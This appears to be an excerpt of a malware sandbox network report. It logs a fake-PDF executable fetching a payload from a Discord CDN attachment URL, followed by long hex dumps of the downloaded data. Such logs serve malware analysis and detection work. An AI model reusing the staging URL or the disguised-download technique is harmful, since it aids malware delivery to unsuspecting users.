Ascii: {OXeC~o&&!75'x 36Fku/~3n/T?CZ9V+Ir1pqXrcO#u$,-4BX+dKBp{lyS=W}X\lqa{UtX+\k>m6~oXJ/Q!/-J\w!5
2021-12-01 15:22:56 UTC	48	IN	Data Raw: 82 3b 13 61 3d 81 bc aa 9c e0 7a f6 c6 ef ad 8e 69 74 fc 47 f6 9b f1 28 07 7e 13 88 28 9a 5b b8 f0 2b 93 d5 69 e2 60 cf e7 0e 90 5e dd 86 3c 97 35 ba cd 0a e5 96 94 5d 9d e7 f2 6a 84 39 f7 4a f6 c2 b2 62 cc fb af c5 48 7c 83 e0 1f aa 9c 77 77 ea 5c 9a 48 97 5b 34 5e 45 8d 2b d1 72 e8 2c b6 46 d4 89 e9 a2 69 ea 0d 76 94 58 a8 6c e4 92 2f c0 a4 65 8b 41 07 68 ff 5f d3 71 64 c5 4a 7b 01 bc bd cc 3f ac 99 dd 9f f4 c8 f9 cf e4 36 6f f4 00 c5 54 be 23 25 ba 5f b3 47 5c b8 bb 34 d8 81 b7 e6 06 65 d8 fc 43 1c 3d 29 cb be 99 01 09 79 90 c1 3c 6c 6d 54 3a 7f 9a 44 94 a0 93 9c 8a 6e f5 d2 38 97 d1 6d 77 0a 75 93 c4 d7 6c 1b 37 70 e8 c5 a0 02 c6 db 8d bb bc 52 a5 03 8c 6d 27 c3 5e d1 ef c2 79 46 91 45 86 2f c4 ce fb 07 7d 6f 24 91 97 cd 42 0a dd 89 3b 78 9d fd cb 42 Data Ascii: ;a=zitG(~([+i`^<5]j9JbH|ww\H[4^E+r,FivXl/eAh_qdJ{?6oT#%_G\4eC=)y<lmT:Dn8mwul7pRm'^yFE/}o$B;xB
2021-12-01 15:22:56 UTC	49	IN	Data Raw: 9c ed bf 2a 43 1d b6 80 97 c9 48 86 2a 55 e3 11 0d 24 2b d2 f6 1d 1f f9 d4 e1 04 2e 4d c0 bf ab 4f 03 6e f5 db 62 3e 15 75 d6 eb b2 3e 52 53 a6 f9 a0 77 9c 76 f9 4a d6 ad 04 e2 0b 96 a1 3d 75 03 73 79 9c 7d c2 fd 80 07 75 5b 51 b0 17 c0 aa 87 bf df 07 ed ca d7 67 50 5d a7 ac c1 29 d4 e9 7e 1c ad 4a c9 51 39 e1 73 f2 c0 28 de 04 1f 2f 44 ec 27 b0 90 a2 90 aa a9 9b f3 a0 f6 62 ca f7 e5 64 da e3 12 76 e6 93 b9 ef bf cd d1 34 a2 59 ef af e4 1e 3b 10 51 97 81 b9 34 ff ac 1e 47 0f 0f f1 b8 93 e4 90 d9 5c c8 dd 80 f4 cb 7e 89 e9 4c ea 6f c9 50 7a 72 11 12 5d df df 75 8f c6 d4 1a a5 d3 b4 b5 3a 74 e3 63 c6 4b 20 35 f9 d4 17 44 00 51 62 cb 42 90 2c 8c 56 ad 1f c7 3b 0c f5 c4 33 8e 56 d9 6f 69 ee f3 be 3f 88 3f 73 ea 44 2a 57 34 05 4d 0e 11 8d 31 7b 81 3b da f0 bd Data Ascii: *CH*U$+.MOnb>u>RSwvJ=usy}u[QgP])~JQ9s(/D'bdv4Y;Q4G\~LoPzr]u:tcK 5DQbB,V;3Voi??sD*W4M1{;
2021-12-01 15:22:56 UTC	50	IN	Data Raw: 0e 80 b9 f7 66 61 84 a0 12 f8 21 e0 d1 74 70 69 38 91 b4 b8 ca 30 21 f6 bf b2 9f 3c 79 f5 53 64 55 7a e6 5b 19 52 4f 98 3d fb 5e b3 39 c5 bd 7d 48 4a b6 a5 dd 87 d2 3d ef 2a eb c3 dc 32 e8 87 59 67 32 3c 9f 3c e7 ed 3a c6 b9 f7 a7 db 3c a2 13 74 9b 24 60 45 ae 27 93 e9 bb 95 54 eb 4f b8 b6 ee 20 dc b0 2a 88 d2 76 9b c8 d4 15 0f fd b1 7d 83 e2 21 04 cf 32 5a ba 41 56 00 fc d9 34 5e ea a9 49 9b 1d 10 94 b6 6d 3c f9 50 48 51 15 3d 47 aa e2 27 52 53 5b 44 6d b4 41 14 c5 b0 e7 55 f4 20 67 9e 02 4f 77 75 98 f6 15 18 ff d3 22 c4 66 af 32 2e 43 c6 20 ac 03 52 51 f8 ae 57 61 d1 9b ac af 04 af 0a 58 74 c7 a5 bf 22 11 4c bb 39 18 7e f2 8e ad aa df ca 25 9a 4e 2e f7 a5 4a 8d d6 33 c8 06 65 bd b9 19 72 52 0e 83 b7 57 2e 64 9a d4 79 04 69 85 54 47 80 46 7d ed 8c 40 96 Data Ascii: fa!tpi80!<ySdUz[RO=^9}HJ=*2Yg2<<:<t$`E'TO *v}!2ZAV4^Im<PHQ=G'RS[DmAU gOwu"f2.C RQWaXt"L9~%N.J3erRW.dyiTGF}@
2021-12-01 15:22:56 UTC	52	IN	Data Raw: 09 71 d5 59 e8 4a ca 56 b6 5a 4e 34 cf 43 8d 31 8e dd 13 dd 1a 8a 2b 5f c1 52 2f 48 93 49 94 1e 27 a4 61 a9 8f 40 4f 2b d1 79 71 0f 0a a2 62 d7 6f 63 70 7f ca 24 21 b6 b6 f4 07 ac 97 ce 6e e6 93 ef 4f a6 6f ad f4 82 f6 57 6a 6b 83 c7 b6 44 d4 b8 96 45 13 6b 49 d8 77 9c 79 02 c0 b6 fb 88 c2 23 27 ec cf 48 10 6a 33 fc 0d d4 b2 5e cc 2b bc ee 17 b7 9e 8d 38 01 c2 98 53 30 46 89 56 5d fd ff 02 f7 df 91 d4 06 7f 1d ba b7 3c 6b 8e 92 cc 50 a0 77 9c 76 6e f5 9e 70 e4 82 51 2c 2d 0a ae 8d a9 95 80 90 88 36 e2 09 7f 19 f8 47 13 95 42 82 a9 99 5d cf 75 06 83 aa 81 ba 2c 6e ee c2 d9 61 48 99 59 45 14 1e 25 e9 90 32 59 2f 60 4f 81 45 12 1a 02 78 39 f0 21 b6 21 51 2a c9 95 d3 b2 95 56 24 23 a8 90 46 7e e6 9d aa db 82 32 55 5f 22 54 bb 34 8b a2 fb 97 c4 d4 eb b4 4e 38 Data Ascii: qYJVZN4C1+_R/HI'a@O+yqbocp$!nOoWjkDEkIwy#'Hj3^+8S0FV]<kPwvnpQ,-6GB]u,naHYE%2Y/`OEx9!!Q*V$#F~2U_"T4N8
2021-12-01 15:22:56 UTC	53	IN	Data Raw: 33 c0 1e 18 16 04 fd ca 1d b0 3d d0 7c 1c 38 70 30 af ba de 11 89 a5 f9 05 80 93 8a 6b 6a f6 4a 26 5b 80 1c 0d f2 9e 94 48 8a 2f cb 47 1e d5 9d 0a 15 bf 71 e9 c4 3b 80 6e 36 59 bc 54 24 65 cb ce ef 52 49 f7 49 de 0f 05 56 d7 74 ee 32 dc b1 02 6c e6 ea ef 68 70 74 fb d0 e0 1d 21 9e ac 49 12 7a 85 84 0c 22 4a 77 84 a3 75 87 2b 20 34 ce e8 24 7c 0f 94 8e a5 77 61 50 5f c5 c9 56 b3 10 19 65 54 8c ba 36 9b 35 85 42 92 a5 97 7b f0 21 b6 21 39 e9 aa 9c 7d 8f 58 b4 13 a0 e9 d8 ed 22 e5 97 29 eb ab 18 16 12 10 80 91 d6 f0 2c 56 71 73 94 d1 e9 6c 06 f0 2e b2 e1 82 27 a6 6c 1a f4 3e 87 30 d0 2f 24 31 cb b0 b0 8f d8 e3 8d 54 4c b8 46 67 f0 44 60 3a 1b 59 7e 24 e8 d7 e6 40 9a df 57 3c f6 75 4f 2f ca cf 7d 5d c4 43 87 c7 57 24 32 dc 2e b4 58 a9 0b 7f 5c 78 81 d3 9e 65 Data Ascii: 3=|8p0kjJ&[H/Gq;n6YT$eRIIVt2lhpt!Iz"Jwu+ 4$|waP_VeT65B{!!9}X"),Vqsl.'l>0/$1TLFgD`:Y~$@W<uO/}]CW$2.X\xe

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49751	162.159.129.233	443	C:\Users\user\Desktop\DOC209272621615.PDF.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 15:22:56 UTC	57	OUT	GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-12-01 15:22:56 UTC	57	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 15:22:56 GMT Content-Type: application/octet-stream Content-Length: 281088 Connection: close CF-Ray: 6b6d50560d15692b-FRA Accept-Ranges: bytes Age: 36009 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb ETag: "95c7205834a4a92a4f9bfc212c2326dc" Expires: Thu, 01 Dec 2022 15:22:56 GMT Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1638333470898312 x-goog-hash: crc32c=meGuLw== x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 281088 X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-12-01 15:22:56 UTC	59	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 25 32 46 4f 74 73 47 70 49 67 46 32 78 37 6e 47 4e 78 6d 72 47 55 6a 67 58 6e 63 54 49 4a 53 47 6b 76 4c 4b 7a 66 65 51 79 59 55 65 36 46 56 44 41 62 6b 41 73 56 55 39 73 50 67 38 68 42 36 72 48 56 71 6c 44 55 6d 25 32 42 69 71 63 6d 52 66 35 39 37 34 6f 47 52 68 76 6d 56 51 53 6e 38 6c 33 72 67 45 76 77 33 58 70 32 4b 37 37 49 50 67 39 37 58 34 52 68 6e 72 37 46 56 4c 62 32 69 77 50 7a 43 62 4b 34 74 55 79 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FOtsGpIgF2x7nGNxmrGUjgXncTIJSGkvLKzfeQyYUe6FVDAbkAsVU9sPg8hB6rHVqlDUm%2BiqcmRf5974oGRhvmVQSn8l3rgEvw3Xp2K77IPg97X4Rhnr7FVLb2iwPzCbK4tUyA%3D%3D"}],"group":"cf-nel","max_age":60
2021-12-01 15:22:56 UTC	59	IN	Data Raw: 05 2d 8f 93 8a 79 c5 0e 44 c6 9d be e1 d7 39 a5 be fd 97 87 e8 6c a2 37 a3 b4 f0 6e a8 c5 04 ae d5 36 25 ea 60 83 ec 68 a5 bb 61 08 a9 43 4b 50 e1 d4 b1 48 d6 bb 78 4d 5a ff 8b e1 c8 95 9c 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 Data Ascii: -yD9l7n6%`haCKPHxMZ-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi
2021-12-01 15:22:56 UTC	60	IN	Data Raw: ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f Data Ascii: !=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4E
2021-12-01 15:22:56 UTC	61	IN	Data Raw: 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d Data Ascii: $$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=
2021-12-01 15:22:56 UTC	63	IN	Data Raw: 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 Data Ascii: I$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$
2021-12-01 15:22:56 UTC	64	IN	Data Raw: 5f 29 c7 2f 48 f2 f2 34 bb d4 7c 8f 96 ba cb b8 20 3d f5 4e 8a 3a 44 92 53 3d f9 6c 9f 62 42 61 0a 31 d1 91 14 16 f2 6e 25 25 a7 e7 11 b8 ad 9c 87 f7 62 21 37 6c 8a 8d 20 26 ad e7 c6 47 93 da 46 6c ed 1f 24 3f 74 6a fd 3d 66 1f f3 d1 5e da f3 b8 27 59 62 43 9a 02 68 7d cc 5c 30 dc ef b2 1e ba a2 e9 35 ff 5d 3a 77 06 04 fc a1 1e a3 ac 78 72 66 4b ab c7 ac 6e 79 d8 60 5d b2 1d 21 b3 87 f3 03 9d 69 86 cb a7 72 ef 39 99 dc 82 77 9f f0 2f 30 dc b4 34 99 87 29 18 16 88 f2 6b fb 16 1c bb c8 dc 2a 18 03 ee f1 a9 85 4b 08 74 d0 e4 89 3f e3 84 24 b3 44 38 1f 3b 36 60 5b c3 5b c4 53 c3 16 11 00 4d 05 e7 03 6e 76 f3 b9 c8 56 3b a7 1b 46 62 be 82 e3 9a 59 b1 1f 1c 3a ea bf 3a d6 6b 78 86 ca de a4 9f f7 41 8f d4 62 df 39 49 1e 2b bd bc a6 72 d4 0c e1 99 f4 dc 19 b5 45 Data Ascii: _)/H4| =N:DS=lbBa1n%%b!7l &GFl$?tj=f^'YbCh}\05]:wxrfKny`]!ir9w/04)k*Kt?$D8;6`[[SMnvV;FbY::kxAb9I+rE
2021-12-01 15:22:56 UTC	65	IN	Data Raw: 37 27 a1 e2 15 7e 39 92 79 fc d5 a4 79 9c 7d e4 3c 52 69 16 97 1b ab 16 0f 76 02 f4 13 fc d8 26 23 a6 71 3d b0 d2 48 bf b5 ed b4 bb 29 1a ab ba 39 cb d8 62 c4 c8 c2 31 7c bf fb a3 78 9a 5e d1 77 20 99 7d 5f 3e fd 55 2c 50 b8 a5 fc 43 10 7c 8d 39 ee 2b db 06 97 a4 e8 0c 7c 9f fb d4 e0 e1 32 fd 04 96 d0 a5 ec 22 2d da c2 8c d1 47 8b f3 bf 20 3e c8 b8 fc 28 3a f5 8a 2a 58 a2 70 a2 2b de 70 65 17 88 23 b5 6f a8 45 54 80 98 67 57 32 43 c5 24 6a d3 1d 26 0d 62 c8 c9 b6 14 a2 a0 1c af 5b 55 34 45 a9 ec d9 c5 6f e8 19 87 bb 34 58 bf 3a 6e 9f 6f 56 ad 1c 2d 2d bc cd 61 27 27 9d f0 30 4e 7a af bb a6 0b f3 cc c8 cb 47 e4 6b 1c 6d 1a 92 37 fc 4f 31 70 0e ed 14 76 9c 17 80 11 8d f2 7c 5d fa 38 ee 45 15 8a 2d c5 49 18 02 94 d5 06 e8 32 5c e6 55 06 56 ce 73 5a a3 ea 33 Data Ascii: 7'~9yy}<Riv&#q=H)9b1|x^w }_>U,PC|9+|2"-G >(:*Xp+pe#oETgW2C$j&b[U4Eo4X:noV--a''0NzGkm7O1pv|]8E-I2\UVsZ3
2021-12-01 15:22:56 UTC	67	IN	Data Raw: ba 2c ca df 94 4b fa 61 2c 7c 62 5e f2 26 2f df 4e c4 aa a4 56 3a 2d d6 ee 29 9d db ba 30 72 7b dc 10 05 79 f3 6b b7 0d 0c 76 44 84 3e 67 1f 3c f1 1a 6b ec 14 13 96 48 af 22 70 4d 67 c1 7c 13 97 c5 f5 91 93 ed 80 9a 66 ce e4 08 7c d8 34 4a e7 1a 21 a4 76 1b 18 40 1a 73 52 2e 7e 18 02 f1 39 c3 34 d4 8b 22 1e 37 f9 d7 9a fc f6 98 23 25 93 d0 f4 40 54 68 3a 08 de 8c 1d ac 89 ad 86 ae 02 f0 46 0c 88 2f c9 4f f0 5d 66 e2 61 dc 28 57 31 c2 ad 8e dc 41 25 21 cd 47 1b a4 1a 2a 73 ed c1 c4 bf 20 3f f5 e3 48 45 50 d2 73 19 88 37 fc 42 76 f9 f3 cb d3 30 43 1c 3d f5 d5 67 48 e5 16 4c 82 39 fe f6 11 ea 5e b1 80 7a 1b ad 0b 43 d3 b0 b7 50 22 62 cf 7b 8b 33 14 c9 55 44 02 ba a9 14 09 54 9b a9 96 2f 41 61 4f 3c 67 b1 13 8f ce 93 4b 41 1d bb 23 95 f9 e3 44 ae 1f a2 6f 61 Data Ascii: ,Ka,|b^&/NV:-)0r{ykvD>g<kH"pMg|f|4J!v@sR.~94"7#%@Th:F/O]fa(W1A%!G*s ?HEPs7Bv0C=gHL9^zCP"b{3UDT/AaO<gKA#Doa
2021-12-01 15:22:56 UTC	68	IN	Data Raw: 12 24 b9 0b 6f 68 f9 3c 6e 62 50 82 a3 d4 ea 27 af 8d 62 b0 ac fe d4 8a 3a 77 98 77 89 73 98 2f 56 98 48 8a 2a f9 9d 26 7c 6a 78 77 89 ae 83 cf 65 cc 0c d5 f5 b1 04 e2 03 86 a2 88 62 a3 70 8c 26 32 45 bb 06 15 4a b9 a8 f2 35 f9 df 9f 46 d0 c5 31 43 6b 78 17 8c 38 1f 8d 02 9b 71 1b b2 89 b4 e6 cc af 98 75 07 0d 7a 0b 60 ff d4 4c f0 46 0c 9c 74 e5 81 b0 1c 85 15 e0 82 4c 83 a3 ef 83 ec 00 63 70 6e a1 e7 8b bc 92 96 57 31 b7 a3 ae 84 35 ec c5 cc 27 da 88 a9 5c d9 7a 15 24 dc 22 be cf e9 ae 89 ad 10 42 aa 48 a5 8e cd 5b 56 af 01 3d eb b7 31 a1 68 fd cd 52 af 5f 1a cf e0 79 0b 64 c7 57 2d b2 89 d2 2c 3d 73 70 fe 49 12 69 40 65 58 c3 d7 69 76 1b b5 c7 93 68 9a 2d 48 9c 74 e2 01 c4 d6 c6 b1 31 56 a1 e1 82 24 79 60 67 e6 6d ef 48 9f fb c8 9c 86 38 51 5a 3d 0f 86 Data Ascii: $oh<nbP'b:wws/VH*&|jxwebp&2EJ5F1Ckx8quz`LFtLcpnW15'\z$"BH[V=1hR_ydW-,=spIi@eXivh-Ht1V$y`gmH8QZ=
2021-12-01 15:22:56 UTC	69	IN	Data Raw: e3 53 5f c6 9b ee 28 5e de 75 c4 95 a7 7a 60 dd 9d fb eb 95 4c 1c 5a 20 4f 2f c9 46 43 de 47 6b 47 88 11 96 50 b5 eb ff c0 80 6c 6e a5 e2 1d b9 2c 3a 18 da d0 62 86 20 36 77 e3 f8 bd 68 9a c4 9a 4c 85 b1 79 c3 17 be c0 2e 40 6c f9 cc ac 34 86 b4 8f 46 94 56 b1 01 00 d3 5b 15 e2 93 d1 7a 14 14 6c 2f 9d 52 d8 76 07 7b 97 cd 6d 14 3a de 2c d0 e0 14 1b a4 cb ed 01 ee 5e 4c 9b f9 de 07 d1 2d f3 97 a0 f6 48 86 2a 5d 67 9b a8 24 41 8a 21 a5 e3 8b 1b 91 54 6a 92 c7 ae 8b a2 61 1a 6a 7d 8b c0 26 cc ca db 84 1c 58 3e 2d b9 ab f0 28 59 26 c9 31 e3 26 4a 13 7c 16 04 e1 00 97 ce b9 56 26 95 ce fe 4d 13 e9 f9 61 22 b4 12 14 12 18 06 11 f4 d2 c2 4d bc ab 1b a7 45 10 9b 0c 8b 38 dd 86 3c 6a 6e 91 57 f5 b0 15 3c 78 16 0f 16 50 85 21 c1 cc 62 cc cf 6f 88 af 28 33 f3 33 70 Data Ascii: S_(^uz`LZ O/FCGkGPln,:b 6whLy.@l4FV[zl/Rv{m:,^L-H*]g$A!Tjaj}&X>-(Y&1&J|V&Ma"ME8<jnW<xP!bo(33p
2021-12-01 15:22:56 UTC	71	IN	Data Raw: e4 04 ff 2b a3 18 c0 a6 6c 27 a7 ee 3e 7e 97 5e df 8e 51 31 3b 7c 51 2d ce ff ca 25 e9 04 2a 44 94 92 46 08 69 33 cf 6f 76 ff 52 2f c9 5e d2 f6 a3 a7 49 d0 f9 dd 14 60 76 e5 0e 78 ff 55 69 93 bb 7f 27 0f f1 26 c2 9d d3 51 cf ec 72 74 63 5b c7 43 8e a3 f0 c9 bc 49 9a 0f f0 4f 2b 47 64 cd 41 17 92 68 ca d2 5f 53 34 44 99 da 93 48 28 c7 92 44 15 89 95 f5 c2 52 c9 52 b3 01 4b 6f 0b 7b 0d 2f cb 40 66 c2 c5 45 8f 0c f6 d1 a5 e7 11 9b 92 31 d0 68 8d a4 67 48 94 73 12 0f 1a 4e ba b7 3a 7f 81 be 38 af 08 75 59 31 5c 77 83 22 3f 8d c6 c9 c2 af 00 c4 d5 69 4f 51 28 de 53 23 a9 1f ba bb 20 b1 d6 f0 a4 be b9 b4 a4 54 d1 67 d8 ad 14 11 90 5e e1 e1 96 c5 2c 54 b7 35 e1 94 57 b7 e1 85 25 74 1c b2 83 8b ca c9 c6 9d fb ca cc c6 e7 ec 25 36 31 c3 54 af 00 cf 78 81 72 0e 87 Data Ascii: +l'>~^Q1;|Q-%*DFi3ovR/^I`vxUi'&Qrtc[CIO+GdAh_S4DH(DRRKo{/@fE1hgHsN:8uY1\w"?iOQ(S# Tg^,T5W%t%61Txr
2021-12-01 15:22:56 UTC	72	IN	Data Raw: da 75 40 62 fb cf 95 42 e0 11 90 57 34 f2 eb 20 20 bf 5d e8 fb c3 69 7a 09 f3 e5 83 b8 b2 80 93 08 ce ec 57 2d ce 71 14 1f ae 88 20 bf de 89 a7 89 cf 6f 54 8a 3c d7 11 07 7e 80 4c 86 3d fb cd d1 a4 3c 7c 60 bf 32 e1 f1 3f 2e 35 ce fa 48 e7 8e b3 81 f6 5d 5f 53 33 5b b9 69 60 5d 2e 40 78 10 14 b4 45 3b e2 82 33 7f 72 ec 0f 9b e4 81 f0 2c 53 33 cc 46 4d 27 b2 ea 57 22 1b d4 ed 08 ee a9 f0 6f ee 66 d9 6f 69 79 03 8a 75 86 1c 5e dd 24 20 ab f8 5d 35 fc ad 8a 61 43 0a f0 2c e9 6e cf 6c 66 33 8a 92 8c c8 55 f1 bd 18 02 e3 17 c0 b8 b3 0c fe d6 30 23 af 3f e0 01 29 ab 0b e5 cc c4 d1 70 eb 2f 2b 8c 38 48 b4 a3 4e be 3f 0c e7 0e 5f 4e ba b3 0a 67 b9 6f 72 d0 95 d3 cb 40 fb 2e 07 44 91 23 27 d6 ef a2 76 1c 8d 64 e8 24 95 13 63 df 43 14 80 d4 ed 84 3a 67 d3 3b ea 36 Data Ascii: u@bBW4 ]izW-q oT<~L=<|`2?.5H]_S3[i`].@xE;3r,S3FM'W"ofoiyu^$ ]5aC,nlf3U0#?)p/+8HN?_Ngor@.D#'vd$cC:g;6
2021-12-01 15:22:56 UTC	73	IN	Data Raw: 1b 0f 26 85 56 cf e9 27 27 24 3a 75 d2 18 c1 50 a8 59 38 f9 e6 cb 60 d4 e1 00 49 34 ab ee 60 8f 10 02 f1 35 7b 9d f6 25 45 17 41 17 0a dc cf 5c d0 e3 72 7e e7 13 62 57 5a 70 2d d8 fc d8 8f 71 fd fa 8c 38 ea 35 32 97 a5 67 58 aa 82 3b e0 96 4e 6a 46 1f 37 ff 72 8f 4d 6c 2b c3 df 25 01 54 a8 9a 55 f7 c4 78 ac ff 1d b9 d9 97 79 f2 c9 d9 2c ae bb b7 e0 b0 92 cd 4d db dd 00 5c cb e7 e5 0c b3 f0 ea 6a e3 8d 37 1a 10 82 48 5b 10 89 a9 0d ba a8 06 f7 04 8a ad c0 be 3f 6b cd 4c 82 33 24 d1 3f 54 60 d6 e9 24 09 d4 fd cb 41 e7 79 ac 3d 2e 5c df 04 c4 78 0d 7b 88 bf 11 80 b3 63 c6 2e 5a 3c 41 13 97 ca cf f8 e4 a3 fe 92 50 02 0f 31 da 36 7d 1a d2 4d 18 89 6e 55 29 cd 93 dd 2e bf 85 ac 4d 1b 2c 88 83 b7 bb fc e6 00 db 5e c7 e5 6a 5d 49 c1 5a 31 19 28 5b d2 24 89 b3 13 Data Ascii: &V''$:uPY8`I4`5{%EA\r~bWZp-q852gX;NjF7rMl+%TUxy,M\j7H[?kL3$?T`$Ay=.\x{c.Z<AP16}MnU).M,^j]IZ1([$
